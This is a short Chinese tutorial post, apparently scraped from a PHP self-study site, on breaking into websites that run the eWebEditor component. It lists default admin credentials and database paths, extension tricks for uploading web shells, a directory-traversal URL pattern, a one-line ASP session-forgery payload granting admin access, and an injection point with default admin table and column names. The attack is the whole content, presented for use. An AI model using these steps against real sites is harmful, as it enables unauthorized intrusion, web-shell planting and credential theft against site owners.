好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

ewebeditor上的那些事 - 网站安全 - 自学php

作者:暗月 1、常规入侵 默认后台:ewebeditor/admin_login.asp 默认密码:admin admin888   2、默认数据库   db/ewebeditor.mdb 有时候可能修改成asp 或者是asa 进了后台就要上传木马 添加aaspsp 或者asa cer aspx php 没有找到后台就要分析数据库 用明小子打开   3、看style(样式哪里)如何有asp aaspsp asa 那么我们就要构造语句 ID=45&style=s_exampleremote ewebeditor.asp?ID=45&style=s_exampleremote   4、ewebeditor遍历路径 漏洞 上传文件管理---选择样式目录(随便选一个目录) 得到: ewebeditor/admin_uploadfile. asp ?id=14 在id=14后面添加&dir=.. 再加&dir=.. &dir=.. 看到整个网站文件了   5、eWebEditor session欺骗漏洞   保存为asp格式上传到网站 <%Session("eWebEditor_User") = "11111111"%> 然后访问网页 再来访问Admin_Default.asp   6、eweb2.7版本以下一个注入 eWebEditor.asp?id=14&style=standard   http:// www.2cto.com /eWebEdito216/eWebEditor.asp?id=14&style=standard   eweb默认的管理员表是:ewebeditor_system 这个表下的默认两个列名为:sys_UserName和sys_userpass

查看更多关于ewebeditor上的那些事 - 网站安全 - 自学php的详细内容...

  阅读:37次